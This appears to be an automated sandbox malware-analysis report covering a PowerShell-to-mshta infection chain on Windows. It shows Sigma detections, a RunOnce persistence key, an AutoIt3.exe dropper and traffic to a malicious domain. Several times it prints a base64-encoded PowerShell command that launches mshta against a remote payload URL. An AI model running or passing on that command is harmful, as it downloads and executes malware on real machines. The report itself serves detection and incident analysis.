      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7436, TargetFilename: C:\Users\user\AppData\Roaming\AutoIt3.exe
      Sigma detected: Suspicious Execution of Powershell with Base64
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, CommandLine|base64offset|contains: B, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, ProcessId: 6908, ProcessName: powershell.exe
      Sigma detected: Suspicious Powershell In Registry Run Keys
      Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: pOwErsHELl -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, EventID: 13, EventType: SetValue, Image: C:\Windows\regedit.exe, ProcessId: 6696, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\MegaLIMLauncher
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, CommandLine|base64offset|contains: B, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, ProcessId: 6908, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7284, ProcessName: svchost.exe

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: Binary string: BthUdTask.pdbGCTL source: mshta.exe, 00000003.00000003.2248732178.0000020567AD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2250278393.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2263967189.000001FD64F86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254394893.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248649818.000002056BAF4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254566671.0000020567B52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2247357184.0000020567ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248042575.000001FD6503C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254039298.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248857191.000002056BAB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248857191.000002056BAC7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2247357184.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211852416.000001CAD88ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211213841.000001CAD63BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2195911293.000001CAD88ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211406536.000001CAD6432000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191443291.000001C2D42F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2194671358.000001CAD63CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1961414659.000001CAD6439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2209666982.000001C2D4234000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191117905.000001CAD63B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191355174.000001CAD63BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2188728920.000001C2D42DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2187081636.000001CAD6447000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2190912701.000001CAD63CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2194511567.000001CAD63BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211271395.000001CAD63EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1960856139.000001CAD643C000.00000004.00000020.00020000.00000000.sdmp, DonaldDuck[1].3.dr
      Source: Binary string: BthUdTask.pdb source: mshta.exe, 00000003.00000003.2248732178.0000020567AD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2250278393.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254394893.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248649818.000002056BAF4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254566671.0000020567B52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248042575.000001FD6503C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254039298.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248857191.000002056BAB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248857191.000002056BAC7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2247357184.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211213841.000001CAD63BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211406536.000001CAD6432000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191443291.000001C2D42F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2194671358.000001CAD63CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1961414659.000001CAD6439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191117905.000001CAD63B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191355174.000001CAD63BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2188728920.000001C2D42DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2190912701.000001CAD63CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2194511567.000001CAD63BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211271395.000001CAD63EF000.00000004.00000020.00020000.00000000.sdmp, DonaldDuck[1].3.dr
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001EA187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_001EA187
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001DE180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_001DE180
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001EA2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_001EA2E4
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001EA66E FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_001EA66E
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001E686D FindFirstFileW,FindNextFileW,FindClose,15_2_001E686D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001DE9BA GetFileAttributesW,FindFirstFileW,FindClose,15_2_001DE9BA
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001E74F0 FindFirstFileW,FindClose,15_2_001E74F0
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001E7591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,15_2_001E7591
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001DDE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_001DDE32
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015CAE75 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,15_2_015CAE75
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015CD545 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,15_2_015CD545
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015CD64D FindFirstFileA,GetLastError,15_2_015CD64D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_0155A20D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,16_2_0155A20D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_0155C9E5 FindFirstFileA,GetLastError,16_2_0155C9E5
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_0155C8DD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,16_2_0155C8DD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: global trafficHTTP traffic detected: GET /webdav/reg/DesolateOxidant.zip HTTP/1.1Host: pwsh2.pajamas-stoic-failing.lolConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /webdav/reg/DonaldDuck HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pwsh2.pajamas-stoic-failing.lolConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001ED935 InternetReadFile,SetEvent,GetLastError,SetEvent,15_2_001ED935
      Source: global trafficHTTP traffic detected: GET /webdav/reg/DonaldDuck HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pwsh2.pajamas-stoic-failing.lolConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /webdav/reg/DesolateOxidant.zip HTTP/1.1Host: pwsh2.pajamas-stoic-failing.lolConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: pwsh2.pajamas-stoic-failing.lol
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E37B8D000.00000004.00000800.00020000.00000000.sdmp, AutoIt3.exe.7.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E37B8D000.00000004.00000800.00020000.00000000.sdmp, AutoIt3.exe.7.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E37B8D000.00000004.00000800.00020000.00000000.sdmp, AutoIt3.exe.7.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E37B8D000.00000004.00000800.00020000.00000000.sdmp, AutoIt3.exe.7.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
      Source: powershell.exe, 0000000D.00000002.2157631799.000001887EC4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
      Source: powershell.exe, 0000000D.00000002.2157631799.000001887EC4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
      Source: powershell.exe, 0000000D.00000002.2157631799.000001887EC4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
      Source: svchost.exe, 00000004.00000002.2957225366.000001A5EA400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: svchost.exe, 00000004.00000003.1896227857.000001A5EA1C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
      Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: svchost.exe, 00000004.00000003.1896227857.000001A5EA1C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: svchost.exe, 00000004.00000003.1896227857.000001A5EA1C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: svchost.exe, 00000004.00000003.1896227857.000001A5EA1FD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000007.00000002.2133959034.0000014E45CA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2118716291.0000018810075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E37B8D000.00000004.00000800.00020000.00000000.sdmp, AutoIt3.exe.7.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E37B8D000.00000004.00000800.00020000.00000000.sdmp, AutoIt3.exe.7.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E37B8D000.00000004.00000800.00020000.00000000.sdmp, AutoIt3.exe.7.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: powershell.exe, 0000000D.00000002.1999890997.0000018800226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E374E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1999890997.0000018800226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000001.00000002.1884840308.000001B9A7E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1981989752.0000014E35C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1960048322.000001760C69B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1999890997.0000018800006000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E374E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1999890997.0000018800226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E37B8D000.00000004.00000800.00020000.00000000.sdmp, AutoIt3.exe.7.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E37B8D000.00000004.00000800.00020000.00000000.sdmp, AutoIt3.exe.7.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
      Source: powershell.exe, 0000000D.00000002.1999890997.0000018800226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: AutoIt3.exe, 0000000F.00000000.1972767910.0000000000245000.00000002.00000001.01000000.00000011.sdmp, AutoIt3.exe, 00000010.00000000.1997535525.0000000000245000.00000002.00000001.01000000.00000011.sdmp, AutoIt3.exe.7.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: powershell.exe, 00000001.00000002.1884840308.000001B9A7EA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
      Source: powershell.exe, 00000001.00000002.1884840308.000001B9A7EEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1981989752.0000014E35C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1960048322.000001760C6CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1960048322.000001760C6BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1999890997.0000018800006000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 0000000D.00000002.1999890997.0000018800226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1999890997.00000188012FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E38375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1999890997.00000188012FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
      Source: powershell.exe, 0000000D.00000002.2118716291.0000018810075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 0000000D.00000002.2118716291.0000018810075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 0000000D.00000002.2118716291.0000018810075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: svchost.exe, 00000004.00000003.1896227857.000001A5EA272000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
      Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
      Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
      Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
      Source: svchost.exe, 00000004.00000003.1896227857.000001A5EA272000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
      Source: powershell.exe, 0000000D.00000002.1999890997.0000018800226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E38EC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1999890997.000001880169B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1999890997.0000018801BFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: mshta.exe, 00000003.00000003.2248078541.000001FD64FF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2264202096.000001FD64FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
      Source: powershell.exe, 00000007.00000002.2133959034.0000014E45CA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2118716291.0000018810075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: svchost.exe, 00000004.00000003.1896227857.000001A5EA272000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
      Source: edb.log.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
      Source: powershell.exe, 00000001.00000002.1884840308.000001B9A8325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1884840308.000001B9A8382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1960048322.000001760CB6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1960048322.000001760CB15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pa
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E3602F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol
      Source: mshta.exe, 00000003.00000003.2248766174.000001FD64FD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2251457783.000001FD64FD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2264087068.000001FD64FD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2259299452.000001FD64FD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E3602F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DesolateOxidant.zipp
      Source: mshta.exe, 0000000C.00000002.2209666982.000001C2D424D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1960856139.000001CAD643C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2188176032.000001CAD643C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
      Source: mshta.exe, 0000000C.00000002.2210021955.000001C2D42DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2209666982.000001C2D424D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#
      Source: mshta.exe, 0000000C.00000003.2188728920.000001C2D42DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2210021955.000001C2D42DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#&
